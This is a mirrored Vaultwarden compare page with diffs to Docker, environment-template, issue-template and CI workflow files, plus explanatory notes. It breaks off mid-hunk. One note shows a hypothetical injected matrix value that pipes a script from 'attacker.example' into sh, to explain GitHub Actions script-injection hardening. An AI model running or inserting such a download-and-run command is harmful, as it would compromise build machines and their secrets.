mirror of https://github.com/dani-garcia/vaultwarden.git
synced 2025-11-27 23:22:33 +02:00

Compare commits: 1.30.5...2ac589d4b4 (242 commits)
.dockerignore

```diff
@@ -1,40 +1,16 @@
-# Local build artifacts
-target
+// Ignore everything
+*
 
-# Data folder
-data
-
-# Misc
-.env
-.env.template
-.gitattributes
-.gitignore
-rustfmt.toml
-
-# IDE files
-.vscode
-.idea
-.editorconfig
-*.iml
-
-# Documentation
-.github
-*.md
-*.txt
-*.yml
-*.yaml
-
-# Docker
-hooks
-tools
-Dockerfile
-.dockerignore
-docker/**
+// Allow what is needed
+!.git
 !docker/healthcheck.sh
 !docker/start.sh
+!macros
+!migrations
+!src
 
-# Web vault
-web-vault
-
-# Vaultwarden Resources
-resources
+!build.rs
+!Cargo.lock
+!Cargo.toml
+!rustfmt.toml
+!rust-toolchain.toml
```
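
The rewrite above flips `.dockerignore` from a blocklist to an allowlist: everything is excluded by default and only what the build needs is re-included, so new top-level files can no longer leak into the build context by accident. A quick way to confirm what actually reaches the builder after such a change (a sketch; it relies on BuildKit's plain progress output, and the Dockerfile path is taken from this repo's layout):

```sh
# BuildKit reports the size of the context it transfers to the daemon, so an
# unexpectedly large number here usually means .dockerignore missed something.
docker build --no-cache --progress=plain -f docker/Dockerfile.debian . 2>&1 \
  | grep -i "transferring context"
```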

.env.template (127 changed lines)

```diff
@@ -15,6 +15,14 @@
 ####################
 
 ## Main data folder
+## This can be a path to local folder or a path to an external location
+## depending on features enabled at build time. Possible external locations:
+##
+## - AWS S3 Bucket (via `s3` feature): s3://bucket-name/path/to/folder
+##
+## When using an external location, make sure to set TMP_FOLDER,
+## TEMPLATES_FOLDER, and DATABASE_URL to local paths and/or a remote database
+## location.
 # DATA_FOLDER=data
 
 ## Individual folders, these override %DATA_FOLDER%
```
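
The new comments allow `DATA_FOLDER` to point at an external location such as an S3 bucket, in which case the purely local folders and the database must be configured separately. A minimal sketch of such a setup, with illustrative values and assuming a binary built with the `s3` feature:

```sh
# Illustrative values only; requires a build with the `s3` feature enabled.
DATA_FOLDER=s3://my-vaultwarden-bucket/vw-data    # external location
TMP_FOLDER=/var/lib/vaultwarden/tmp               # must be a local path
TEMPLATES_FOLDER=/var/lib/vaultwarden/templates   # must be a local path
DATABASE_URL=postgresql://vw:change-me@db.internal:5432/vaultwarden  # remote DB
```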

```diff
@@ -22,10 +30,13 @@
 # ICON_CACHE_FOLDER=data/icon_cache
 # ATTACHMENTS_FOLDER=data/attachments
 # SENDS_FOLDER=data/sends
 
+## Temporary folder used for storing temporary file uploads
+## Must be a local path.
 # TMP_FOLDER=data/tmp
 
-## Templates data folder, by default uses embedded templates
-## Check source code to see the format
+## HTML template overrides data folder
+## Must be a local path.
 # TEMPLATES_FOLDER=data/templates
 ## Automatically reload the templates for every request, slow, use only for development
 # RELOAD_TEMPLATES=false
@@ -39,7 +50,9 @@
 #########################
 
 ## Database URL
-## When using SQLite, this is the path to the DB file, default to %DATA_FOLDER%/db.sqlite3
+## When using SQLite, this is the path to the DB file, and it defaults to
+## %DATA_FOLDER%/db.sqlite3. If DATA_FOLDER is set to an external location, this
+## must be set to a local sqlite3 file path.
 # DATABASE_URL=data/db.sqlite3
 ## When using MySQL, specify an appropriate connection URI.
 ## Details: https://docs.diesel.rs/2.1.x/diesel/mysql/struct.MysqlConnection.html
@@ -84,27 +97,28 @@
 ### WebSocket ###
 #################
 
-## Enables websocket notifications
-# WEBSOCKET_ENABLED=false
-
-## Controls the WebSocket server address and port
-# WEBSOCKET_ADDRESS=0.0.0.0
-# WEBSOCKET_PORT=3012
+## Enable websocket notifications
+# ENABLE_WEBSOCKET=true
 
 ##########################
 ### Push notifications ###
 ##########################
 
 ## Enables push notifications (requires key and id from https://bitwarden.com/host)
-## If you choose "European Union" Data Region, uncomment PUSH_RELAY_URI and PUSH_IDENTITY_URI then replace .com by .eu
 ## Details about mobile client push notification:
 ## - https://github.com/dani-garcia/vaultwarden/wiki/Enabling-Mobile-Client-push-notification
 # PUSH_ENABLED=false
 # PUSH_INSTALLATION_ID=CHANGEME
 # PUSH_INSTALLATION_KEY=CHANGEME
-## Don't change this unless you know what you're doing.
+# WARNING: Do not modify the following settings unless you fully understand their implications!
+# Default Push Relay and Identity URIs
 # PUSH_RELAY_URI=https://push.bitwarden.com
 # PUSH_IDENTITY_URI=https://identity.bitwarden.com
+# European Union Data Region Settings
+# If you have selected "European Union" as your data region, use the following URIs instead.
+# PUSH_RELAY_URI=https://api.bitwarden.eu
+# PUSH_IDENTITY_URI=https://identity.bitwarden.eu
 
 #####################
 ### Schedule jobs ###
@@ -116,7 +130,7 @@
 ## and are always in terms of UTC time (regardless of your local time zone settings).
 ##
 ## The schedule format is a bit different from crontab as crontab does not contains seconds.
-## You can test the the format here: https://crontab.guru, but remove the first digit!
+## You can test the format here: https://crontab.guru, but remove the first digit!
 ## SEC MIN HOUR DAY OF MONTH MONTH DAY OF WEEK
 ## "0 30 9,12,15 1,15 May-Aug Mon,Wed,Fri"
 ## "0 30 * * * * "
```
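
Because the scheduler prepends a seconds field to the usual five crontab fields, a plain crontab expression gains one leading value. For example (an illustrative value for one of the purge jobs this file configures):

```sh
# Fields: SEC MIN HOUR DAY-OF-MONTH MONTH DAY-OF-WEEK
# Run the Send purge job daily at 03:30:00 UTC:
SEND_PURGE_SCHEDULE="0 30 3 * * *"
```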

```diff
@@ -156,6 +170,10 @@
 ## Cron schedule of the job that cleans old auth requests from the auth request.
 ## Defaults to every minute. Set blank to disable this job.
 # AUTH_REQUEST_PURGE_SCHEDULE="30 * * * * *"
+##
+## Cron schedule of the job that cleans expired Duo contexts from the database. Does nothing if Duo MFA is disabled or set to use the legacy iframe prompt.
+## Defaults to every minute. Set blank to disable this job.
+# DUO_CONTEXT_PURGE_SCHEDULE="30 * * * * *"
 
 ########################
 ### General settings ###
@@ -224,7 +242,8 @@
 # SIGNUPS_ALLOWED=true
 
 ## Controls if new users need to verify their email address upon registration
-## Note that setting this option to true prevents logins until the email address has been verified!
+## On new client versions, this will require the user to verify their email at signup time.
+## On older clients, it will require the user to verify their email before they can log in.
 ## The welcome email will include a verification link, and login attempts will periodically
 ## trigger another verification email to be sent.
 # SIGNUPS_VERIFY=false
@@ -254,7 +273,7 @@
 ## A comma-separated list means only those users can create orgs:
 # ORG_CREATION_USERS=admin1@example.com,admin2@example.com
 
-## Invitations org admins to invite users, even when signups are disabled
+## Allows org admins to invite users, even when signups are disabled
 # INVITATIONS_ALLOWED=true
 ## Name shown in the invitation emails that don't come from a specific organization
 # INVITATION_ORG_NAME=Vaultwarden
@@ -275,12 +294,13 @@
 ## The default for new users. If changed, it will be updated during login for existing users.
 # PASSWORD_ITERATIONS=600000
 
-## Controls whether users can set password hints. This setting applies globally to all users.
+## Controls whether users can set or show password hints. This setting applies globally to all users.
 # PASSWORD_HINTS_ALLOWED=true
 
 ## Controls whether a password hint should be shown directly in the web page if
-## SMTP service is not configured. Not recommended for publicly-accessible instances
-## as this provides unauthenticated access to potentially sensitive data.
+## SMTP service is not configured and password hints are allowed.
+## Not recommended for publicly-accessible instances because this provides
+## unauthenticated access to potentially sensitive data.
 # SHOW_PASSWORD_HINT=false
 
 #########################
@@ -321,28 +341,33 @@
 
 ## Icon download timeout
 ## Configure the timeout value when downloading the favicons.
-## The default is 10 seconds, but this could be to low on slower network connections
+## The default is 10 seconds, but this could be too low on slower network connections
 # ICON_DOWNLOAD_TIMEOUT=10
 
-## Icon blacklist Regex
-## Any domains or IPs that match this regex won't be fetched by the icon service.
+## Block HTTP domains/IPs by Regex
+## Any domains or IPs that match this regex won't be fetched by the internal HTTP client.
 ## Useful to hide other servers in the local network. Check the WIKI for more details
-## NOTE: Always enclose this regex withing single quotes!
-# ICON_BLACKLIST_REGEX='^(192\.168\.0\.[0-9]+|192\.168\.1\.[0-9]+)$'
+## NOTE: Always enclose this regex within single quotes!
+# HTTP_REQUEST_BLOCK_REGEX='^(192\.168\.0\.[0-9]+|192\.168\.1\.[0-9]+)$'
 
-## Any IP which is not defined as a global IP will be blacklisted.
+## Enabling this will cause the internal HTTP client to refuse to connect to any non-global IP address.
 ## Useful to secure your internal environment: See https://en.wikipedia.org/wiki/Reserved_IP_addresses for a list of IPs which it will block
-# ICON_BLACKLIST_NON_GLOBAL_IPS=true
+# HTTP_REQUEST_BLOCK_NON_GLOBAL_IPS=true
 
 ## Client Settings
 ## Enable experimental feature flags for clients.
 ## This is a comma-separated list of flags, e.g. "flag1,flag2,flag3".
+## Note that clients cache the /api/config endpoint for about 1 hour and it could take some time before they are enabled or disabled!
 ##
 ## The following flags are available:
-## - "autofill-overlay": Add an overlay menu to form fields for quick access to credentials.
-## - "autofill-v2": Use the new autofill implementation.
-## - "browser-fileless-import": Directly import credentials from other providers without a file.
-## - "fido2-vault-credentials": Enable the use of FIDO2 security keys as second factor.
+## - "inline-menu-positioning-improvements": Enable the use of inline menu password generator and identity suggestions in the browser extension.
+## - "inline-menu-totp": Enable the use of inline menu TOTP codes in the browser extension.
+## - "ssh-agent": Enable SSH agent support on Desktop. (Needs desktop >=2024.12.0)
+## - "ssh-key-vault-item": Enable the creation and use of SSH key vault items. (Needs clients >=2024.12.0)
+## - "export-attachments": Enable support for exporting attachments (Clients >=2025.4.0)
+## - "anon-addy-self-host-alias": Enable configuring self-hosted Anon Addy alias generator. (Needs Android >=2025.3.0, iOS >=2025.4.0)
+## - "simple-login-self-host-alias": Enable configuring self-hosted Simple Login alias generator. (Needs Android >=2025.3.0, iOS >=2025.4.0)
+## - "mutual-tls": Enable the use of mutual TLS on Android (Client >= 2025.2.0)
 # EXPERIMENTAL_CLIENT_FEATURE_FLAGS=fido2-vault-credentials
 
 ## Require new device emails. When a user logs in an email is required to be sent.
```
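
Note the renames in this hunk: `ICON_BLACKLIST_REGEX` becomes `HTTP_REQUEST_BLOCK_REGEX` and `ICON_BLACKLIST_NON_GLOBAL_IPS` becomes `HTTP_REQUEST_BLOCK_NON_GLOBAL_IPS`, reflecting that the filter now applies to the whole internal HTTP client rather than just the icon service. Existing configs need the new names; a migration sketch using the values from the template:

```sh
# Old names, kept for comparison:
#   ICON_BLACKLIST_REGEX='^(192\.168\.0\.[0-9]+|192\.168\.1\.[0-9]+)$'
#   ICON_BLACKLIST_NON_GLOBAL_IPS=true
# New names; keep the single quotes around the regex:
HTTP_REQUEST_BLOCK_REGEX='^(192\.168\.0\.[0-9]+|192\.168\.1\.[0-9]+)$'
HTTP_REQUEST_BLOCK_NON_GLOBAL_IPS=true
```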

```diff
@@ -366,8 +391,9 @@
 ## Log level
 ## Change the verbosity of the log output
 ## Valid values are "trace", "debug", "info", "warn", "error" and "off"
-## Setting it to "trace" or "debug" would also show logs for mounted
-## routes and static file, websocket and alive requests
+## Setting it to "trace" or "debug" would also show logs for mounted routes and static file, websocket and alive requests
+## For a specific module append a comma separated `path::to::module=log_level`
+## For example, to only see debug logs for icons use: LOG_LEVEL="info,vaultwarden::api::icons=debug"
 # LOG_LEVEL=info
 
 ## Token for the admin interface, preferably an Argon2 PCH string
```
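
For the admin token mentioned in the last context line, an Argon2 PHC string can be generated with the reference `argon2` CLI. A sketch following the approach the project wiki describes (the tool must be installed, and the cost parameters are a starting point, not a requirement):

```sh
# Produce an Argon2id PHC string suitable for ADMIN_TOKEN.
# -e: encoded output, -id: Argon2id, -k: memory (KiB), -t: iterations, -p: lanes
echo -n "MySecretPassword" | argon2 "$(openssl rand -base64 32)" -e -id -k 65540 -t 3 -p 4
```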

```diff
@@ -400,6 +426,14 @@
 ## Multiple values must be separated with a whitespace.
 # ALLOWED_IFRAME_ANCESTORS=
 
+## Allowed connect-src (Know the risks!)
+## https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/connect-src
+## Allows other domains to URLs which can be loaded using script interfaces like the Forwarded email alias feature
+## This adds the configured value to the 'Content-Security-Policy' headers 'connect-src' value.
+## Multiple values must be separated with a whitespace. And only HTTPS values are allowed.
+## Example: "https://my-addy-io.domain.tld https://my-simplelogin.domain.tld"
+# ALLOWED_CONNECT_SRC=""
+
 ## Number of seconds, on average, between login requests from the same IP address before rate limiting kicks in.
 # LOGIN_RATELIMIT_SECONDS=60
 ## Allow a burst of requests of up to this size, while maintaining the average indicated by `LOGIN_RATELIMIT_SECONDS`.
@@ -413,6 +447,18 @@
 ## KNOW WHAT YOU ARE DOING!
 # ORG_GROUPS_ENABLED=false
 
+## Increase secure note size limit (Know the risks!)
+## Sets the secure note size limit to 100_000 instead of the default 10_000.
+## WARNING: This could cause issues with clients. Also exports will not work on Bitwarden servers!
+## KNOW WHAT YOU ARE DOING!
+# INCREASE_NOTE_SIZE_LIMIT=false
+
+## Enforce Single Org with Reset Password Policy
+## Enforce that the Single Org policy is enabled before setting the Reset Password policy
+## Bitwarden enforces this by default. In Vaultwarden we encouraged to use multiple organizations because groups were not available.
+## Setting this to true will enforce the Single Org Policy to be enabled before you can enable the Reset Password policy.
+# ENFORCE_SINGLE_ORG_WITH_RESET_PW_POLICY=false
+
 ########################
 ### MFA/2FA settings ###
 ########################
@@ -426,15 +472,21 @@
 # YUBICO_SERVER=http://yourdomain.com/wsapi/2.0/verify
 
 ## Duo Settings
-## You need to configure all options to enable global Duo support, otherwise users would need to configure it themselves
+## You need to configure the DUO_IKEY, DUO_SKEY, and DUO_HOST options to enable global Duo support.
+## Otherwise users will need to configure it themselves.
 ## Create an account and protect an application as mentioned in this link (only the first step, not the rest):
 ## https://help.bitwarden.com/article/setup-two-step-login-duo/#create-a-duo-security-account
 ## Then set the following options, based on the values obtained from the last step:
-# DUO_IKEY=<Integration Key>
-# DUO_SKEY=<Secret Key>
+# DUO_IKEY=<Client ID>
+# DUO_SKEY=<Client Secret>
 # DUO_HOST=<API Hostname>
 ## After that, you should be able to follow the rest of the guide linked above,
 ## ignoring the fields that ask for the values that you already configured beforehand.
+##
+## If you want to attempt to use Duo's 'Traditional Prompt' (deprecated, iframe based) set DUO_USE_IFRAME to 'true'.
+## Duo no longer supports this, but it still works for some integrations.
+## If you aren't sure, leave this alone.
+# DUO_USE_IFRAME=false
 
 ## Email 2FA settings
 ## Email token size
@@ -448,6 +500,11 @@
 ##
 ## Maximum attempts before an email token is reset and a new email will need to be sent.
 # EMAIL_ATTEMPTS_LIMIT=3
+##
+## Setup email 2FA on registration regardless of any organization policy
+# EMAIL_2FA_ENFORCE_ON_VERIFIED_INVITE=false
+## Automatically setup email 2FA as fallback provider when needed
+# EMAIL_2FA_AUTO_FALLBACK=false
 
 ## Other MFA/2FA settings
 ## Disable 2FA remember
@@ -524,9 +581,9 @@
 ## Only use this as a last resort if you are not able to use a valid certificate.
 # SMTP_ACCEPT_INVALID_HOSTNAMES=false
 
-##########################
+#######################
 ### Rocket settings ###
-##########################
+#######################
 
 ## Rocket specific settings
 ## See https://rocket.rs/v0.5/guide/configuration/ for more details.
```

.github/CODEOWNERS (3 changed lines)

```diff
@@ -1,3 +1,6 @@
 /.github @dani-garcia @BlackDex
+/.github/** @dani-garcia @BlackDex
 /.github/CODEOWNERS @dani-garcia @BlackDex
+/.github/ISSUE_TEMPLATE/** @dani-garcia @BlackDex
 /.github/workflows/** @dani-garcia @BlackDex
+/SECURITY.md @dani-garcia @BlackDex
```

.github/ISSUE_TEMPLATE/bug_report.md (deleted, 66 lines)

```diff
@@ -1,66 +0,0 @@
----
-name: Bug report
-about: Use this ONLY for bugs in vaultwarden itself. Use the Discourse forum (link below) to request features or get help with usage/configuration. If in doubt, use the forum.
-title: ''
-labels: ''
-assignees: ''
-
----
-<!--
-# ###
-NOTE: Please update to the latest version of vaultwarden before reporting an issue!
-This saves you and us a lot of time and troubleshooting.
-See:
-* https://github.com/dani-garcia/vaultwarden/issues/1180
-* https://github.com/dani-garcia/vaultwarden/wiki/Updating-the-vaultwarden-image
-# ###
--->
-
-<!--
-Please fill out the following template to make solving your problem easier and faster for us.
-This is only a guideline. If you think that parts are unnecessary for your issue, feel free to remove them.
-
-Remember to hide/redact personal or confidential information,
-such as passwords, IP addresses, and DNS names as appropriate.
--->
-
-### Subject of the issue
-<!-- Describe your issue here. -->
-
-### Deployment environment
-
-<!--
-=========================================================================================
-Preferably, use the `Generate Support String` button on the admin page's Diagnostics tab.
-That will auto-generate most of the info requested in this section.
-=========================================================================================
--->
-
-<!-- The version number, obtained from the logs (at startup) or the admin diagnostics page -->
-<!-- This is NOT the version number shown on the web vault, which is versioned separately from vaultwarden -->
-<!-- Remember to check if your issue exists on the latest version first! -->
-* vaultwarden version:
-
-<!-- How the server was installed: Docker image, OS package, built from source, etc. -->
-* Install method:
-
-* Clients used: <!-- web vault, desktop, Android, iOS, etc. (if applicable) -->
-
-* Reverse proxy and version: <!-- if applicable -->
-
-* MySQL/MariaDB or PostgreSQL version: <!-- if applicable -->
-
-* Other relevant details:
-
-### Steps to reproduce
-<!-- Tell us how to reproduce this issue. What parameters did you set (differently from the defaults)
-and how did you start vaultwarden? -->
-
-### Expected behaviour
-<!-- Tell us what you expected to happen -->
-
-### Actual behaviour
-<!-- Tell us what actually happened -->
-
-### Troubleshooting data
-<!-- Share any log files, screenshots, or other relevant troubleshooting data -->
```

.github/ISSUE_TEMPLATE/bug_report.yml (new file, 182 lines)

```diff
@@ -0,0 +1,182 @@
+name: Bug Report
+description: File a bug report
+labels: ["bug"]
+body:
+  #
+  - type: markdown
+    attributes:
+      value: |
+        Thanks for taking the time to fill out this bug report!
+
+        Please **do not** submit feature requests or ask for help on how to configure Vaultwarden here!
+
+        The [GitHub Discussions](https://github.com/dani-garcia/vaultwarden/discussions/) has sections for Questions and Ideas.
+
+        Our [Wiki](https://github.com/dani-garcia/vaultwarden/wiki/) has topics on how to configure Vaultwarden.
+
+        Also, make sure you are running [](https://github.com/dani-garcia/vaultwarden/releases/latest) of Vaultwarden!
+
+        Be sure to check and validate the Vaultwarden Admin Diagnostics (`/admin/diagnostics`) page for any errors!
+        See here [how to enable the admin page](https://github.com/dani-garcia/vaultwarden/wiki/Enabling-admin-page).
+
+        > [!IMPORTANT]
+        > :bangbang: Search for existing **Open _AND_ Closed** [Issues](https://github.com/dani-garcia/vaultwarden/issues?q=is%3Aissue%20) **_AND_** [Discussions](https://github.com/dani-garcia/vaultwarden/discussions?discussions_q=) regarding your topic before posting!
+  #
+  - type: checkboxes
+    id: checklist
+    attributes:
+      label: Prerequisites
+      description: Please confirm you have completed the following before submitting an issue
+      options:
+        - label: I have searched the existing issues and discussions
+          required: true
+        - label: I have read the documentation
+          required: true
+  #
+  - id: support-string
+    type: textarea
+    attributes:
+      label: Vaultwarden Support String
+      description: Output of the **Generate Support String** from the `/admin/diagnostics` page.
+      placeholder: |
+        1. Go to the Vaultwarden Admin of your instance https://example.domain.tld/admin/diagnostics
+        2. Click on `Generate Support String`
+        3. Click on `Copy To Clipboard`
+        4. Replace this text by pasting it into this textarea without any modifications
+    validations:
+      required: true
+  #
+  - id: version
+    type: input
+    attributes:
+      label: Vaultwarden Build Version
+      description: What version of Vaultwarden are you running?
+      placeholder: ex. v1.34.0 or v1.34.1-53f58b14
+    validations:
+      required: true
+  #
+  - id: deployment
+    type: dropdown
+    attributes:
+      label: Deployment method
+      description: How did you deploy Vaultwarden?
+      multiple: false
+      options:
+        - Official Container Image
+        - Build from source
+        - OS Package (apt, yum/dnf, pacman, apk, nix, ...)
+        - Manually Extracted from Container Image
+        - Downloaded from GitHub Actions Release Workflow
+        - Other method
+    validations:
+      required: true
+  #
+  - id: deployment-other
+    type: textarea
+    attributes:
+      label: Custom deployment method
+      description: If you deployed Vaultwarden via any other method, please describe how.
+  #
+  - id: reverse-proxy
+    type: input
+    attributes:
+      label: Reverse Proxy
+      description: Are you using a reverse proxy, if so which and what version?
+      placeholder: ex. nginx 1.29.0, caddy 2.10.0, traefik 3.4.4, haproxy 3.2
+    validations:
+      required: true
+  #
+  - id: os
+    type: dropdown
+    attributes:
+      label: Host/Server Operating System
+      description: On what operating system are you running the Vaultwarden server?
+      multiple: false
+      options:
+        - Linux
+        - NAS/SAN
+        - Cloud
+        - Windows
+        - macOS
+        - Other
+    validations:
+      required: true
+  #
+  - id: os-version
+    type: input
+    attributes:
+      label: Operating System Version
+      description: What version of the operating system(s) are you seeing the problem on?
+      placeholder: ex. Arch Linux, Ubuntu 24.04, Kubernetes, Synology DSM 7.x, Windows 11
+  #
+  - id: clients
+    type: dropdown
+    attributes:
+      label: Clients
+      description: What client(s) are you seeing the problem on?
+      multiple: true
+      options:
+        - Web Vault
+        - Browser Extension
+        - CLI
+        - Desktop
+        - Android
+        - iOS
+    validations:
+      required: true
+  #
+  - id: client-version
+    type: input
+    attributes:
+      label: Client Version
+      description: What version(s) of the client(s) are you seeing the problem on?
+      placeholder: ex. CLI v2025.7.0, Firefox 140 - v2025.6.1
+  #
+  - id: reproduce
+    type: textarea
+    attributes:
+      label: Steps To Reproduce
+      description: How can we reproduce the behavior.
+      value: |
+        1. Go to '...'
+        2. Click on '....'
+        3. Scroll down to '....'
+        4. Click on '...'
+        5. Etc '...'
+    validations:
+      required: true
+  #
+  - id: expected
+    type: textarea
+    attributes:
+      label: Expected Result
+      description: A clear and concise description of what you expected to happen.
+    validations:
+      required: true
+  #
+  - id: actual
+    type: textarea
+    attributes:
+      label: Actual Result
+      description: A clear and concise description of what is happening.
+    validations:
+      required: true
+  #
+  - id: logs
+    type: textarea
+    attributes:
+      label: Logs
+      description: Provide the logs generated by Vaultwarden during the time this issue occurs.
+      render: text
+  #
+  - id: screenshots
+    type: textarea
+    attributes:
+      label: Screenshots or Videos
+      description: If applicable, add screenshots and/or a short video to help explain your problem.
+  #
+  - id: additional-context
+    type: textarea
+    attributes:
+      label: Additional Context
+      description: Add any other context about the problem here.
```

.github/ISSUE_TEMPLATE/config.yml (10 changed lines)

```diff
@@ -1,8 +1,8 @@
 blank_issues_enabled: false
 contact_links:
-  - name: Discourse forum for vaultwarden
-    url: https://vaultwarden.discourse.group/
-    about: Use this forum to request features or get help with usage/configuration.
-  - name: GitHub Discussions for vaultwarden
+  - name: GitHub Discussions for Vaultwarden
     url: https://github.com/dani-garcia/vaultwarden/discussions
-    about: An alternative to the Discourse forum, if this is easier for you.
+    about: Use the discussions to request features or get help with usage/configuration.
+  - name: Discourse forum for Vaultwarden
+    url: https://vaultwarden.discourse.group/
+    about: An alternative to the GitHub Discussions, if this is easier for you.
```

.github/workflows/build.yml (107 changed lines)

```diff
@@ -1,4 +1,5 @@
 name: Build
+permissions: {}
 
 on:
   push:
@@ -13,6 +14,7 @@ on:
       - "diesel.toml"
      - "docker/Dockerfile.j2"
       - "docker/DockerSettings.yaml"
+
   pull_request:
     paths:
       - ".github/workflows/build.yml"
@@ -28,12 +30,17 @@ on:
 
 jobs:
   build:
+    name: Build and Test ${{ matrix.channel }}
+    permissions:
+      actions: write
+      contents: read
+    # We use Ubuntu 22.04 here because this matches the library versions used within the Debian docker containers
     runs-on: ubuntu-22.04
     timeout-minutes: 120
     # Make warnings errors, this is to prevent warnings slipping through.
     # This is done globally to prevent rebuilds when the RUSTFLAGS env variable changes.
     env:
-      RUSTFLAGS: "-D warnings"
+      RUSTFLAGS: "-Dwarnings"
     strategy:
       fail-fast: false
       matrix:
@@ -41,32 +48,33 @@ jobs:
           - "rust-toolchain" # The version defined in rust-toolchain
           - "msrv" # The supported MSRV
 
-    name: Build and Test ${{ matrix.channel }}
-
     steps:
-      # Checkout the repo
-      - name: "Checkout"
-        uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 #v4.1.1
-      # End Checkout the repo
-
-
       # Install dependencies
       - name: "Install dependencies Ubuntu"
         run: sudo apt-get update && sudo apt-get install -y --no-install-recommends openssl build-essential libmariadb-dev-compat libpq-dev libssl-dev pkg-config
       # End Install dependencies
 
+      # Checkout the repo
+      - name: "Checkout"
+        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
+        with:
+          persist-credentials: false
+          fetch-depth: 0
+      # End Checkout the repo
+
       # Determine rust-toolchain version
       - name: Init Variables
         id: toolchain
         shell: bash
+        env:
+          CHANNEL: ${{ matrix.channel }}
         run: |
-          if [[ "${{ matrix.channel }}" == 'rust-toolchain' ]]; then
+          if [[ "${CHANNEL}" == 'rust-toolchain' ]]; then
             RUST_TOOLCHAIN="$(grep -oP 'channel.*"(\K.*?)(?=")' rust-toolchain.toml)"
-          elif [[ "${{ matrix.channel }}" == 'msrv' ]]; then
+          elif [[ "${CHANNEL}" == 'msrv' ]]; then
             RUST_TOOLCHAIN="$(grep -oP 'rust-version.*"(\K.*?)(?=")' Cargo.toml)"
           else
-            RUST_TOOLCHAIN="${{ matrix.channel }}"
+            RUST_TOOLCHAIN="${CHANNEL}"
           fi
           echo "RUST_TOOLCHAIN=${RUST_TOOLCHAIN}" | tee -a "${GITHUB_OUTPUT}"
       # End Determine rust-toolchain version
```
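
A pattern worth noting in the hunk above: the inline `${{ matrix.channel }}` interpolations inside `run:` scripts are replaced by an `env:` mapping read back as `"${CHANNEL}"`. The likely motivation is script-injection hardening, since `${{ }}` expressions are pasted into the script text before the shell ever parses it, whereas an environment variable stays plain data. A shell illustration of the difference, with a hypothetical hostile value:

```sh
# If the runner inlined the value, something like
#   channel="msrv\"; curl https://attacker.example/x.sh | sh; \""
# would be spliced into the script as code before bash parses it.
# Read through the environment, the same value is just an inert string:
if [[ "${CHANNEL}" == 'rust-toolchain' ]]; then
  echo "using the pinned toolchain"
fi
```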

```diff
@@ -74,7 +82,7 @@ jobs:
 
       # Only install the clippy and rustfmt components on the default rust-toolchain
       - name: "Install rust-toolchain version"
-        uses: dtolnay/rust-toolchain@be73d7920c329f220ce78e0234b8f96b7ae60248 # master @ 2023-12-07 - 10:22 PM GMT+1
+        uses: dtolnay/rust-toolchain@b3b07ba8b418998c39fb20f53e8b695cdcc8de1b # master @ Apr 29, 2025, 9:22 PM GMT+2
         if: ${{ matrix.channel == 'rust-toolchain' }}
         with:
           toolchain: "${{steps.toolchain.outputs.RUST_TOOLCHAIN}}"
@@ -84,7 +92,7 @@ jobs:
 
       # Install the any other channel to be used for which we do not execute clippy and rustfmt
       - name: "Install MSRV version"
-        uses: dtolnay/rust-toolchain@be73d7920c329f220ce78e0234b8f96b7ae60248 # master @ 2023-12-07 - 10:22 PM GMT+1
+        uses: dtolnay/rust-toolchain@b3b07ba8b418998c39fb20f53e8b695cdcc8de1b # master @ Apr 29, 2025, 9:22 PM GMT+2
         if: ${{ matrix.channel != 'rust-toolchain' }}
         with:
           toolchain: "${{steps.toolchain.outputs.RUST_TOOLCHAIN}}"
@@ -92,11 +100,13 @@ jobs:
 
       # Set the current matrix toolchain version as default
       - name: "Set toolchain ${{steps.toolchain.outputs.RUST_TOOLCHAIN}} as default"
+        env:
+          RUST_TOOLCHAIN: ${{steps.toolchain.outputs.RUST_TOOLCHAIN}}
         run: |
           # Remove the rust-toolchain.toml
           rm rust-toolchain.toml
           # Set the default
-          rustup default ${{steps.toolchain.outputs.RUST_TOOLCHAIN}}
+          rustup default "${RUST_TOOLCHAIN}"
 
       # Show environment
       - name: "Show environment"
@@ -106,7 +116,8 @@ jobs:
       # End Show environment
 
       # Enable Rust Caching
-      - uses: Swatinem/rust-cache@23bce251a8cd2ffc3c1075eaa2367cf899916d84 # v2.7.3
+      - name: Rust Caching
+        uses: Swatinem/rust-cache@98c8021b550208e191a6a3145459bfc9fb29c4c0 # v2.8.0
         with:
           # Use a custom prefix-key to force a fresh start. This is sometimes needed with bigger changes.
           # Like changing the build host from Ubuntu 20.04 to 22.04 for example.
@@ -116,33 +127,39 @@ jobs:
 
       # Run cargo tests
       # First test all features together, afterwards test them separately.
+      - name: "test features: sqlite,mysql,postgresql,enable_mimalloc,query_logger"
+        id: test_sqlite_mysql_postgresql_mimalloc_logger
+        if: ${{ !cancelled() }}
+        run: |
+          cargo test --features sqlite,mysql,postgresql,enable_mimalloc,query_logger
+
       - name: "test features: sqlite,mysql,postgresql,enable_mimalloc"
         id: test_sqlite_mysql_postgresql_mimalloc
-        if: $${{ always() }}
+        if: ${{ !cancelled() }}
         run: |
           cargo test --features sqlite,mysql,postgresql,enable_mimalloc
 
       - name: "test features: sqlite,mysql,postgresql"
         id: test_sqlite_mysql_postgresql
-        if: $${{ always() }}
+        if: ${{ !cancelled() }}
         run: |
           cargo test --features sqlite,mysql,postgresql
 
       - name: "test features: sqlite"
         id: test_sqlite
-        if: $${{ always() }}
+        if: ${{ !cancelled() }}
         run: |
           cargo test --features sqlite
 
       - name: "test features: mysql"
         id: test_mysql
-        if: $${{ always() }}
+        if: ${{ !cancelled() }}
         run: |
           cargo test --features mysql
 
       - name: "test features: postgresql"
         id: test_postgresql
-        if: $${{ always() }}
+        if: ${{ !cancelled() }}
        run: |
           cargo test --features postgresql
       # End Run cargo tests
@@ -151,16 +168,16 @@ jobs:
       # Run cargo clippy, and fail on warnings
       - name: "clippy features: sqlite,mysql,postgresql,enable_mimalloc"
         id: clippy
-        if: ${{ always() && matrix.channel == 'rust-toolchain' }}
+        if: ${{ !cancelled() && matrix.channel == 'rust-toolchain' }}
         run: |
-          cargo clippy --features sqlite,mysql,postgresql,enable_mimalloc -- -D warnings
+          cargo clippy --features sqlite,mysql,postgresql,enable_mimalloc
       # End Run cargo clippy
 
 
       # Run cargo fmt (Only run on rust-toolchain defined version)
       - name: "check formatting"
         id: formatting
-        if: ${{ always() && matrix.channel == 'rust-toolchain' }}
+        if: ${{ !cancelled() && matrix.channel == 'rust-toolchain' }}
         run: |
           cargo fmt --all -- --check
       # End Run cargo fmt
@@ -170,21 +187,31 @@ jobs:
       # This is useful so all test/clippy/fmt actions are done, and they can all be addressed
       - name: "Some checks failed"
         if: ${{ failure() }}
+        env:
